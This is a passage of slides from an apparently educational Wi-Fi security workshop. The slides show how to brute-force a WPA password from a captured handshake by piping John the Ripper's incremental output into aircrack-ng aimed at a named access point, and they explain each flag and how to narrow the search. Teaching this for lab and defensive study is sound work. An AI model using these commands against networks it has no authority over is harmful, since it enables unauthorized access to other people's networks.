![Page 246: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/246.jpg)
Brute forcing a password
• As you already have the four way hand shake, we will be moving right into the cracking portion of this example
![Page 247: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/247.jpg)
Type #john –stdout –incremental:all | aircrack-ng –b 00:1a:c4:51:3c:31 –w –
acm_dictioanry-01.cap• john
– program we using. short for john the ripper• -stdout
– directs standard out to aircrack-ng• -incremental:all
– will increment through all possible passwords• | aircrack-ng
– second program we are running with the input being supplied by john the ripper
• -b 00:1a:c4:51:3c:31– tells aircrack-ng which access point to attack
• -w –– this is where the standard output of john the ripper is going
• acm_dictionary-01.cap– the file containing the four way handshake to be brute forced
![Page 248: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/248.jpg)
Type #john –stdout –incremental:all | aircrack-ng –b 00:1a:c4:51:3c:31 –w – acm_dictioanry-01.cap
![Page 249: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/249.jpg)
Type #john –stdout –incremental:all | aircrack-ng –b 00:1a:c4:51:3c:31 –w – acm_dictioanry-01.cap
![Page 250: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/250.jpg)
Brute forcing a password
• The previous slide shows John the Ripper and aircrack-ng being used together
• There are ways to cut down on the number of possible passwords, for example– if you know the password is 14 characters, you
can have john skip passwords less than and greater than 14 characters.
• This is the longest way to crack a password but also a guaranteed way to do it